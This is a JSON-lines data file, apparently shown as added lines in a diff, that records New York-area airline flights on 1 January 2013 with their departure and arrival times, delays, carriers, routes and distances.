+{"year":2013,"month":1,"day":1,"dep_time":1803,"sched_dep_time":1726,"dep_delay":37,"arr_time":2011,"sched_arr_time":1934,"arr_delay":37,"carrier":"EV","flight":4382,"tailnum":"N13958","origin":"EWR","dest":"DTW","air_time":104,"distance":488,"hour":17,"minute":26,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1803,"sched_dep_time":1620,"dep_delay":103,"arr_time":2008,"sched_arr_time":1750,"arr_delay":138,"carrier":"MQ","flight":4622,"tailnum":"N504MQ","origin":"LGA","dest":"BNA","air_time":154,"distance":764,"hour":16,"minute":20,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1803,"sched_dep_time":1800,"dep_delay":3,"arr_time":2021,"sched_arr_time":2001,"arr_delay":20,"carrier":"US","flight":373,"tailnum":"N510UW","origin":"JFK","dest":"CLT","air_time":100,"distance":541,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1805,"sched_dep_time":1757,"dep_delay":8,"arr_time":2117,"sched_arr_time":2119,"arr_delay":-2,"carrier":"UA","flight":1152,"tailnum":"N39463","origin":"EWR","dest":"PDX","air_time":336,"distance":2434,"hour":17,"minute":57,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1806,"sched_dep_time":1810,"dep_delay":-4,"arr_time":2002,"sched_arr_time":1945,"arr_delay":17,"carrier":"MQ","flight":4484,"tailnum":"N711MQ","origin":"LGA","dest":"BNA","air_time":152,"distance":764,"hour":18,"minute":10,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1807,"sched_dep_time":1738,"dep_delay":29,"arr_time":2251,"sched_arr_time":2103,"carrier":"UA","flight":1228,"tailnum":"N31412","origin":"EWR","dest":"SAN","distance":2425,"hour":17,"minute":38,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1808,"sched_dep_time":1815,"dep_delay":-7,"arr_time":2111,"sched_arr_time":2130,"arr_delay":-19,"carrier":"AS","flight":7,"tailnum":"N553AS","origin":"EWR","dest":"SEA","air_time":336,"distance":2402,"hour":18,"minute":15,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1809,"sched_dep_time":1810,"dep_delay":-1,"arr_time":2117,"sched_arr_time":2132,"arr_delay":-15,"carrier":"B6","flight":217,"tailnum":"N592JB","origin":"JFK","dest":"LGB","air_time":337,"distance":2465,"hour":18,"minute":10,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1811,"sched_dep_time":1759,"dep_delay":12,"arr_time":2132,"sched_arr_time":2118,"arr_delay":14,"carrier":"UA","flight":618,"tailnum":"N482UA","origin":"EWR","dest":"DFW","air_time":228,"distance":1372,"hour":17,"minute":59,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1814,"sched_dep_time":1700,"dep_delay":74,"arr_time":2051,"sched_arr_time":1855,"arr_delay":116,"carrier":"EV","flight":4202,"tailnum":"N19966","origin":"EWR","dest":"STL","air_time":177,"distance":872,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1814,"sched_dep_time":1815,"dep_delay":-1,"arr_time":2122,"sched_arr_time":2151,"arr_delay":-29,"carrier":"B6","flight":173,"tailnum":"N569JB","origin":"JFK","dest":"SJC","air_time":334,"distance":2569,"hour":18,"minute":15,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1815,"sched_dep_time":1325,"dep_delay":290,"arr_time":2120,"sched_arr_time":1542,"arr_delay":338,"carrier":"EV","flight":4417,"tailnum":"N17185","origin":"EWR","dest":"OMA","air_time":213,"distance":1134,"hour":13,"minute":25,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1815,"sched_dep_time":1805,"dep_delay":10,"arr_time":1928,"sched_arr_time":1920,"arr_delay":8,"carrier":"WN","flight":731,"tailnum":"N266WN","origin":"LGA","dest":"BWI","air_time":46,"distance":185,"hour":18,"minute":5,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1816,"sched_dep_time":1805,"dep_delay":11,"arr_time":2013,"sched_arr_time":1955,"arr_delay":18,"carrier":"MQ","flight":4626,"tailnum":"N8EGMQ","origin":"LGA","dest":"CMH","air_time":93,"distance":479,"hour":18,"minute":5,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1816,"sched_dep_time":1800,"dep_delay":16,"arr_time":2101,"sched_arr_time":2050,"arr_delay":11,"carrier":"UA","flight":638,"tailnum":"N522UA","origin":"EWR","dest":"LAS","air_time":307,"distance":2227,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1817,"sched_dep_time":1820,"dep_delay":-3,"arr_time":2008,"sched_arr_time":2005,"arr_delay":3,"carrier":"AA","flight":353,"tailnum":"N3AXAA","origin":"LGA","dest":"ORD","air_time":138,"distance":733,"hour":18,"minute":20,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1820,"sched_dep_time":1820,"dep_delay":0,"arr_time":2216,"sched_arr_time":2150,"arr_delay":26,"carrier":"AA","flight":119,"tailnum":"N3FMAA","origin":"EWR","dest":"LAX","air_time":366,"distance":2454,"hour":18,"minute":20,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1823,"sched_dep_time":1830,"dep_delay":-7,"arr_time":2036,"sched_arr_time":2055,"arr_delay":-19,"carrier":"DL","flight":924,"tailnum":"N337NW","origin":"JFK","dest":"MSP","air_time":158,"distance":1029,"hour":18,"minute":30,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1824,"sched_dep_time":1830,"dep_delay":-6,"arr_time":2203,"sched_arr_time":2205,"arr_delay":-2,"carrier":"AA","flight":269,"tailnum":"N3ETAA","origin":"JFK","dest":"SEA","air_time":348,"distance":2422,"hour":18,"minute":30,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1825,"sched_dep_time":1829,"dep_delay":-4,"arr_time":2056,"sched_arr_time":2053,"arr_delay":3,"carrier":"9E","flight":3286,"tailnum":"N906XJ","origin":"JFK","dest":"DTW","air_time":107,"distance":509,"hour":18,"minute":29,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1825,"sched_dep_time":1829,"dep_delay":-4,"arr_time":2046,"sched_arr_time":2032,"arr_delay":14,"carrier":"US","flight":1973,"tailnum":"N460UW","origin":"EWR","dest":"CLT","air_time":106,"distance":529,"hour":18,"minute":29,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1826,"sched_dep_time":1810,"dep_delay":16,"arr_time":2132,"sched_arr_time":2130,"arr_delay":2,"carrier":"AA","flight":1611,"tailnum":"N3DWAA","origin":"LGA","dest":"MIA","air_time":153,"distance":1096,"hour":18,"minute":10,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1826,"sched_dep_time":1830,"dep_delay":-4,"arr_time":2154,"sched_arr_time":2207,"arr_delay":-13,"carrier":"DL","flight":1643,"tailnum":"N3772H","origin":"JFK","dest":"SEA","air_time":334,"distance":2422,"hour":18,"minute":30,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1827,"sched_dep_time":1829,"dep_delay":-2,"arr_time":2105,"sched_arr_time":2056,"arr_delay":9,"carrier":"UA","flight":1139,"tailnum":"N39728","origin":"EWR","dest":"DEN","air_time":246,"distance":1605,"hour":18,"minute":29,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1828,"sched_dep_time":1805,"dep_delay":23,"arr_time":2023,"sched_arr_time":1951,"arr_delay":32,"carrier":"EV","flight":4334,"tailnum":"N11119","origin":"LGA","dest":"CLE","air_time":80,"distance":419,"hour":18,"minute":5,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1830,"sched_dep_time":1829,"dep_delay":1,"arr_time":2131,"sched_arr_time":2125,"arr_delay":6,"carrier":"UA","flight":1684,"tailnum":"N33714","origin":"EWR","dest":"PBI","air_time":152,"distance":1023,"hour":18,"minute":29,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1832,"sched_dep_time":1823,"dep_delay":9,"arr_time":1948,"sched_arr_time":1940,"arr_delay":8,"carrier":"EV","flight":4326,"tailnum":"N13988","origin":"EWR","dest":"PWM","air_time":48,"distance":284,"hour":18,"minute":23,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1832,"sched_dep_time":1835,"dep_delay":-3,"arr_time":2059,"sched_arr_time":2103,"arr_delay":-4,"carrier":"9E","flight":3830,"tailnum":"N8894A","origin":"JFK","dest":"CHS","air_time":106,"distance":636,"hour":18,"minute":35,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1832,"sched_dep_time":1828,"dep_delay":4,"arr_time":2144,"sched_arr_time":2144,"arr_delay":0,"carrier":"UA","flight":1075,"tailnum":"N18220","origin":"EWR","dest":"SNA","air_time":342,"distance":2434,"hour":18,"minute":28,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1834,"sched_dep_time":1840,"dep_delay":-6,"arr_time":2027,"sched_arr_time":2020,"arr_delay":7,"carrier":"MQ","flight":3730,"tailnum":"N517MQ","origin":"EWR","dest":"ORD","air_time":137,"distance":719,"hour":18,"minute":40,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1834,"sched_dep_time":1800,"dep_delay":34,"arr_time":2014,"sched_arr_time":1942,"arr_delay":32,"carrier":"UA","flight":668,"tailnum":"N467UA","origin":"LGA","dest":"ORD","air_time":123,"distance":733,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1836,"sched_dep_time":1726,"dep_delay":70,"arr_time":2107,"sched_arr_time":1933,"arr_delay":94,"carrier":"EV","flight":4179,"tailnum":"N14543","origin":"EWR","dest":"CVG","air_time":123,"distance":569,"hour":17,"minute":26,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1840,"sched_dep_time":1836,"dep_delay":4,"arr_time":2022,"sched_arr_time":2010,"arr_delay":12,"carrier":"B6","flight":130,"tailnum":"N281JB","origin":"JFK","dest":"BUF","air_time":70,"distance":301,"hour":18,"minute":36,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1840,"sched_dep_time":1845,"dep_delay":-5,"arr_time":2055,"sched_arr_time":2030,"arr_delay":25,"carrier":"MQ","flight":4517,"tailnum":"N725MQ","origin":"LGA","dest":"CRW","air_time":96,"distance":444,"hour":18,"minute":45,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1840,"sched_dep_time":1845,"dep_delay":-5,"arr_time":2223,"sched_arr_time":2226,"arr_delay":-3,"carrier":"UA","flight":389,"tailnum":"N508UA","origin":"JFK","dest":"SFO","air_time":357,"distance":2586,"hour":18,"minute":45,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1842,"sched_dep_time":1422,"dep_delay":260,"arr_time":1958,"sched_arr_time":1535,"arr_delay":263,"carrier":"EV","flight":4633,"tailnum":"N18120","origin":"EWR","dest":"BTV","air_time":46,"distance":266,"hour":14,"minute":22,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1842,"sched_dep_time":1829,"dep_delay":13,"arr_time":2144,"sched_arr_time":2136,"arr_delay":8,"carrier":"UA","flight":1292,"tailnum":"N14214","origin":"EWR","dest":"FLL","air_time":149,"distance":1065,"hour":18,"minute":29,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1843,"sched_dep_time":1850,"dep_delay":-7,"arr_time":2052,"sched_arr_time":2050,"arr_delay":2,"carrier":"AA","flight":2019,"tailnum":"N594AA","origin":"LGA","dest":"STL","air_time":169,"distance":888,"hour":18,"minute":50,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1843,"sched_dep_time":1845,"dep_delay":-2,"arr_time":1955,"sched_arr_time":2024,"arr_delay":-29,"carrier":"DL","flight":904,"tailnum":"N344NB","origin":"JFK","dest":"BOS","air_time":34,"distance":187,"hour":18,"minute":45,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1843,"sched_dep_time":1835,"dep_delay":8,"arr_time":2339,"sched_arr_time":2346,"arr_delay":-7,"carrier":"DL","flight":329,"tailnum":"N900PC","origin":"JFK","dest":"SJU","air_time":192,"distance":1598,"hour":18,"minute":35,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1846,"sched_dep_time":1745,"dep_delay":61,"arr_time":2147,"sched_arr_time":2055,"arr_delay":52,"carrier":"AA","flight":785,"tailnum":"N3ESAA","origin":"LGA","dest":"DFW","air_time":223,"distance":1389,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1846,"sched_dep_time":1855,"dep_delay":-9,"arr_time":2336,"sched_arr_time":2355,"arr_delay":-19,"carrier":"AA","flight":1613,"tailnum":"N5BYAA","origin":"JFK","dest":"SJU","air_time":190,"distance":1598,"hour":18,"minute":55,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1848,"sched_dep_time":1745,"dep_delay":63,"arr_time":2238,"sched_arr_time":2120,"arr_delay":78,"carrier":"AA","flight":177,"tailnum":"N332AA","origin":"JFK","dest":"SFO","air_time":361,"distance":2586,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1849,"sched_dep_time":1900,"dep_delay":-11,"arr_time":2131,"sched_arr_time":2129,"arr_delay":2,"carrier":"FL","flight":645,"tailnum":"N920AT","origin":"LGA","dest":"ATL","air_time":134,"distance":762,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1850,"sched_dep_time":1900,"dep_delay":-10,"arr_time":2007,"sched_arr_time":2016,"arr_delay":-9,"carrier":"EV","flight":5714,"tailnum":"N835AS","origin":"JFK","dest":"IAD","air_time":55,"distance":228,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1850,"sched_dep_time":1850,"dep_delay":0,"arr_time":2142,"sched_arr_time":2141,"arr_delay":1,"carrier":"9E","flight":3364,"tailnum":"N908XJ","origin":"JFK","dest":"MSY","air_time":207,"distance":1182,"hour":18,"minute":50,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1850,"sched_dep_time":1850,"dep_delay":0,"arr_time":2249,"sched_arr_time":2240,"arr_delay":9,"carrier":"VX","flight":29,"tailnum":"N638VA","origin":"JFK","dest":"SFO","air_time":364,"distance":2586,"hour":18,"minute":50,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1853,"sched_dep_time":1900,"dep_delay":-7,"arr_time":2004,"sched_arr_time":2018,"arr_delay":-14,"carrier":"US","flight":2187,"tailnum":"N951UW","origin":"LGA","dest":"DCA","air_time":54,"distance":214,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1854,"sched_dep_time":1830,"dep_delay":24,"arr_time":2055,"sched_arr_time":2015,"arr_delay":40,"carrier":"MQ","flight":4674,"tailnum":"N518MQ","origin":"LGA","dest":"CLE","air_time":87,"distance":419,"hour":18,"minute":30,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1855,"sched_dep_time":1859,"dep_delay":-4,"arr_time":2140,"sched_arr_time":2145,"arr_delay":-5,"carrier":"DL","flight":947,"tailnum":"N339NW","origin":"LGA","dest":"ATL","air_time":135,"distance":762,"hour":18,"minute":59,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1855,"sched_dep_time":1848,"dep_delay":7,"arr_time":2203,"sched_arr_time":2200,"arr_delay":3,"carrier":"UA","flight":1128,"tailnum":"N36207","origin":"LGA","dest":"IAH","air_time":231,"distance":1416,"hour":18,"minute":48,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1856,"sched_dep_time":1645,"dep_delay":131,"arr_time":2212,"sched_arr_time":2005,"arr_delay":127,"carrier":"AA","flight":181,"tailnum":"N323AA","origin":"JFK","dest":"LAX","air_time":336,"distance":2475,"hour":16,"minute":45,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1856,"sched_dep_time":1859,"dep_delay":-3,"arr_time":2133,"sched_arr_time":2155,"arr_delay":-22,"carrier":"B6","flight":155,"tailnum":"N505JB","origin":"JFK","dest":"MCO","air_time":133,"distance":944,"hour":18,"minute":59,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1856,"sched_dep_time":1855,"dep_delay":1,"arr_time":2142,"sched_arr_time":2142,"arr_delay":0,"carrier":"DL","flight":951,"tailnum":"N173DZ","origin":"JFK","dest":"ATL","air_time":132,"distance":760,"hour":18,"minute":55,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1858,"sched_dep_time":1900,"dep_delay":-2,"arr_time":2034,"sched_arr_time":2035,"arr_delay":-1,"carrier":"WN","flight":2944,"tailnum":"N905WN","origin":"LGA","dest":"MKE","air_time":131,"distance":738,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1859,"sched_dep_time":1900,"dep_delay":-1,"arr_time":2012,"sched_arr_time":2021,"arr_delay":-9,"carrier":"EV","flight":4131,"tailnum":"N11544","origin":"EWR","dest":"RIC","air_time":55,"distance":277,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1859,"sched_dep_time":1900,"dep_delay":-1,"arr_time":2151,"sched_arr_time":2238,"arr_delay":-47,"carrier":"DL","flight":1967,"tailnum":"N329NW","origin":"JFK","dest":"MIA","air_time":150,"distance":1089,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1900,"sched_dep_time":1845,"dep_delay":15,"arr_time":2212,"sched_arr_time":2227,"arr_delay":-15,"carrier":"B6","flight":91,"tailnum":"N523JB","origin":"JFK","dest":"OAK","air_time":330,"distance":2576,"hour":18,"minute":45,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1904,"sched_dep_time":1905,"dep_delay":-1,"arr_time":2139,"sched_arr_time":2227,"arr_delay":-48,"carrier":"DL","flight":2159,"tailnum":"N3758Y","origin":"JFK","dest":"MCO","air_time":133,"distance":944,"hour":19,"minute":5,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1904,"sched_dep_time":1905,"dep_delay":-1,"arr_time":2157,"sched_arr_time":2208,"arr_delay":-11,"carrier":"UA","flight":1444,"tailnum":"N14242","origin":"EWR","dest":"TPA","air_time":150,"distance":997,"hour":19,"minute":5,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1905,"sched_dep_time":1900,"dep_delay":5,"arr_time":2311,"sched_arr_time":2301,"arr_delay":10,"carrier":"DL","flight":853,"tailnum":"N727TW","origin":"JFK","dest":"SFO","air_time":361,"distance":2586,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1906,"sched_dep_time":1915,"dep_delay":-9,"arr_time":2211,"sched_arr_time":2244,"arr_delay":-33,"carrier":"DL","flight":2391,"tailnum":"N922DL","origin":"JFK","dest":"TPA","air_time":159,"distance":1005,"hour":19,"minute":15,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1909,"sched_dep_time":1912,"dep_delay":-3,"arr_time":2239,"sched_arr_time":2237,"arr_delay":2,"carrier":"B6","flight":87,"tailnum":"N559JB","origin":"JFK","dest":"SLC","air_time":291,"distance":1990,"hour":19,"minute":12,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1909,"sched_dep_time":1910,"dep_delay":-1,"arr_time":2212,"sched_arr_time":2224,"arr_delay":-12,"carrier":"DL","flight":1629,"tailnum":"N6710E","origin":"JFK","dest":"LAS","air_time":323,"distance":2248,"hour":19,"minute":10,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1910,"sched_dep_time":1909,"dep_delay":1,"arr_time":2126,"sched_arr_time":2046,"arr_delay":40,"carrier":"EV","flight":3807,"tailnum":"N13978","origin":"EWR","dest":"BNA","air_time":159,"distance":748,"hour":19,"minute":9,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1910,"sched_dep_time":1910,"dep_delay":0,"arr_time":2126,"sched_arr_time":2107,"arr_delay":19,"carrier":"9E","flight":3359,"tailnum":"N925XJ","origin":"JFK","dest":"ORD","air_time":141,"distance":740,"hour":19,"minute":10,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1910,"sched_dep_time":1855,"dep_delay":15,"arr_time":2118,"sched_arr_time":2103,"arr_delay":15,"carrier":"US","flight":1491,"tailnum":"N540UW","origin":"LGA","dest":"CLT","air_time":107,"distance":544,"hour":18,"minute":55,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1911,"sched_dep_time":1910,"dep_delay":1,"arr_time":2050,"sched_arr_time":2055,"arr_delay":-5,"carrier":"MQ","flight":4569,"tailnum":"N737MQ","origin":"LGA","dest":"RDU","air_time":81,"distance":431,"hour":19,"minute":10,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1912,"sched_dep_time":1915,"dep_delay":-3,"arr_time":2200,"sched_arr_time":2219,"arr_delay":-19,"carrier":"DL","flight":1485,"tailnum":"N917DL","origin":"LGA","dest":"MCO","air_time":142,"distance":950,"hour":19,"minute":15,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1912,"sched_dep_time":1908,"dep_delay":4,"arr_time":2242,"sched_arr_time":2257,"arr_delay":-15,"carrier":"UA","flight":927,"tailnum":"N432UA","origin":"EWR","dest":"PHX","air_time":309,"distance":2133,"hour":19,"minute":8,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1915,"sched_dep_time":1920,"dep_delay":-5,"arr_time":2238,"sched_arr_time":2257,"arr_delay":-19,"carrier":"DL","flight":6,"tailnum":"N633DL","origin":"JFK","dest":"SLC","air_time":281,"distance":1990,"hour":19,"minute":20,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1915,"sched_dep_time":1904,"dep_delay":11,"arr_time":2242,"sched_arr_time":2246,"arr_delay":-4,"carrier":"UA","flight":1606,"tailnum":"N76503","origin":"EWR","dest":"SFO","air_time":351,"distance":2565,"hour":19,"minute":4,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1916,"sched_dep_time":1920,"dep_delay":-4,"arr_time":2053,"sched_arr_time":2100,"arr_delay":-7,"carrier":"AA","flight":359,"tailnum":"N3CUAA","origin":"LGA","dest":"ORD","air_time":136,"distance":733,"hour":19,"minute":20,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1919,"sched_dep_time":1900,"dep_delay":19,"arr_time":2125,"sched_arr_time":2107,"arr_delay":18,"carrier":"EV","flight":3267,"tailnum":"N14558","origin":"EWR","dest":"CLT","air_time":105,"distance":529,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1921,"sched_dep_time":1920,"dep_delay":1,"arr_time":2315,"sched_arr_time":2319,"arr_delay":-4,"carrier":"DL","flight":541,"tailnum":"N375DA","origin":"JFK","dest":"PHX","air_time":314,"distance":2153,"hour":19,"minute":20,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1923,"sched_dep_time":1837,"dep_delay":46,"arr_time":2139,"sched_arr_time":2045,"arr_delay":54,"carrier":"EV","flight":4125,"tailnum":"N23139","origin":"EWR","dest":"GRR","air_time":116,"distance":605,"hour":18,"minute":37,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1923,"sched_dep_time":1859,"dep_delay":24,"arr_time":2239,"sched_arr_time":2234,"arr_delay":5,"carrier":"B6","flight":171,"tailnum":"N552JB","origin":"JFK","dest":"SMF","air_time":333,"distance":2521,"hour":18,"minute":59,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1925,"sched_dep_time":1930,"dep_delay":-5,"arr_time":2037,"sched_arr_time":2050,"arr_delay":-13,"carrier":"EV","flight":5742,"tailnum":"N833AS","origin":"LGA","dest":"IAD","air_time":52,"distance":229,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1925,"sched_dep_time":1900,"dep_delay":25,"arr_time":2259,"sched_arr_time":2238,"arr_delay":21,"carrier":"DL","flight":87,"tailnum":"N624AG","origin":"JFK","dest":"LAX","air_time":332,"distance":2475,"hour":19,"minute":0,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1926,"sched_dep_time":1910,"dep_delay":16,"arr_time":2258,"sched_arr_time":2215,"arr_delay":43,"carrier":"AA","flight":2075,"tailnum":"N4XFAA","origin":"EWR","dest":"DFW","air_time":248,"distance":1372,"hour":19,"minute":10,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1928,"sched_dep_time":1930,"dep_delay":-2,"arr_time":2117,"sched_arr_time":2135,"arr_delay":-18,"carrier":"9E","flight":4261,"tailnum":"N8611A","origin":"JFK","dest":"RDU","air_time":75,"distance":427,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1929,"sched_dep_time":1920,"dep_delay":9,"arr_time":3,"sched_arr_time":7,"arr_delay":-4,"carrier":"UA","flight":1071,"tailnum":"N27205","origin":"EWR","dest":"BQN","air_time":192,"distance":1585,"hour":19,"minute":20,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1930,"sched_dep_time":1745,"dep_delay":105,"arr_time":2233,"sched_arr_time":2112,"arr_delay":81,"carrier":"DL","flight":503,"tailnum":"N3764D","origin":"JFK","dest":"SAN","air_time":333,"distance":2446,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1934,"sched_dep_time":1725,"dep_delay":129,"arr_time":2126,"sched_arr_time":1855,"arr_delay":151,"carrier":"MQ","flight":4255,"tailnum":"N909MQ","origin":"JFK","dest":"BNA","air_time":154,"distance":765,"hour":17,"minute":25,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1935,"sched_dep_time":1930,"dep_delay":5,"arr_time":2223,"sched_arr_time":2143,"arr_delay":40,"carrier":"EV","flight":4085,"tailnum":"N12157","origin":"EWR","dest":"OMA","air_time":209,"distance":1134,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1937,"sched_dep_time":1905,"dep_delay":32,"arr_time":2250,"sched_arr_time":2225,"arr_delay":25,"carrier":"AA","flight":21,"tailnum":"N327AA","origin":"JFK","dest":"LAX","air_time":332,"distance":2475,"hour":19,"minute":5,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1938,"sched_dep_time":1703,"dep_delay":155,"arr_time":2109,"sched_arr_time":1823,"arr_delay":166,"carrier":"EV","flight":4300,"tailnum":"N18557","origin":"EWR","dest":"RIC","air_time":68,"distance":277,"hour":17,"minute":3,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1939,"sched_dep_time":1840,"dep_delay":59,"arr_time":29,"sched_arr_time":2151,"carrier":"9E","flight":3325,"tailnum":"N905XJ","origin":"JFK","dest":"DFW","distance":1391,"hour":18,"minute":40,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1939,"sched_dep_time":1940,"dep_delay":-1,"arr_time":2238,"sched_arr_time":2240,"arr_delay":-2,"carrier":"AA","flight":1787,"tailnum":"N3EGAA","origin":"JFK","dest":"TPA","air_time":158,"distance":1005,"hour":19,"minute":40,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1940,"sched_dep_time":1905,"dep_delay":35,"arr_time":2033,"sched_arr_time":2021,"arr_delay":12,"carrier":"UA","flight":698,"tailnum":"N580UA","origin":"EWR","dest":"BOS","air_time":36,"distance":200,"hour":19,"minute":5,"time_hour":"2013-01-01 19:00:00"} 